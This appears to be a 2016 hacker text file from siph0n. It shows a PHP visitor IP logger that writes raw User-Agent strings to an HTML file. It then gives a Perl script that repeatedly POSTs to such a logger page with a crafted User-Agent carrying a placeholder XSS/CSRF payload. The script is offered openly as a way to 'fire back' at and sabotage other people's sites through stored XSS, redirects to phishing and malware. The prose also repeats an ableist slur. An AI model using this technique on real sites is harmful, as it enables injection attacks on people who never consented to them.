~————————————————————–~
~Crafted User Agent~
~Flexibilty in modern Pentesting~
~Hitting Back With an upper Hand Against Pesky Ip Logging~
~————————————————————–~
Basic Code In PHP for ip loggers.
~————————————————————–~
$ip = $_SERVER[‘REMOTE_ADDR’];
$agent = $_SERVER[‘HTTP_USER_AGENT’];
$output = "IP: $ip - Agent: $agent"
“;
$fopen = fopen(“ip.html”, “a”);
fwrite($fopen, $output);
fclose($fopen);
?>
~——————————————————————-~
In Most of these retarded sites, Mostly Scene kid sites.
Run a Ip Logger On The Index page. Honestly its retarded how
They do this as some of these “Scene kids” Call For NO LOGS !!!
But Log Themselves ?. This is the basics of Crafting a Agent
and Effectively Sabotaging What they have came to Create.
Its honestly some of the most retarded kids that would do this
and some are actually just using it for research on the sites
traffic, not just to keep logs. However some do Either way.
For the pages that do log, the worse thing to come to them would
be the User Agent Strings in their php codes. Why is this a
problem ? The php code is Their to display the incoming user agent.
So what ? Displaying the user agent isnt that bad right ?
Alot of times it isnt. Its usually harmless unless they actually
store the logs. This could lead to CSRF/XSS that leads to Malware
and Redirects to Phishing etc.
~——————————————————————-~
#!usr/bin/perl -w
#Basic LWP User Agent Script for a Crafted User Agent.
use LWP::UserAgent;
use strict;
print “Basics of a Crafted User Agent\n”;
while(1){
my $ua = LWP::UserAgent->new;
$ua->agent(“CSRF/XSS Code”);
my $req = HTTP::Request->new(POST => “IPLOGGER PAGE GOES HERE”);
$req->content_type(‘application/x-www-form-urlencoded’);
$req->content(‘query=libwww-perl&mode=dist’);
my $res = $ua->request($req);
if ($res->is_success) {
print “Success !\n”;
}
else {
print “Aw\n”;
}
}
~——————————————————————-~
You can do all kinds of things with this. Infact you can add a whole
page within your limits. Hope This shows the basic of Crafted Requests
and a better grip on Firing Back.
~——————————————————————-~
Knowledge Is Power
Hacking isnt Swatting,Doxing or DDOS
Its all about Thinking Outside the boxes Limits
Best Luck to everyone In the future !
– SonnySpooks –
~——————————————————————-~
_.-“\
_.-” \ Dont mind this…
,-” \
( \ 100 Reasons\
\ \ IIS is \
\ \ Trash \
\ \ _.-;
\ \ _.-” :
\ \,-” _.-”
\( _.-”
`–“
# siph0n [2016-05-16]